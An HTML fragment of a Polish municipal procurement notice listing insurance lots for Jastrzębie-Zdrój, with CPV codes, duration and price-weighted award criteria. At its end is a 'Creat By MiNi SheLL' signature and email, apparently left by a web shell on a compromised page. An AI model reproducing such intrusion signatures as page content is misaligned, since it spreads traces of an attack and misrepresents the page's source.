<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. KLAUZULE FAKULTATYWNE - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ubezpieczenie OC nadwyżkowej dla Miasta Jastrzębie-Zdrój i wybranych jednostek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzenia działalności i posiadania mienia - ubezpieczenie nadwyżkowe do umowy OC podstawowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.60.00-0, 66.51.64.00-4, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. KLAUZULE FAKULTATYWNE - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com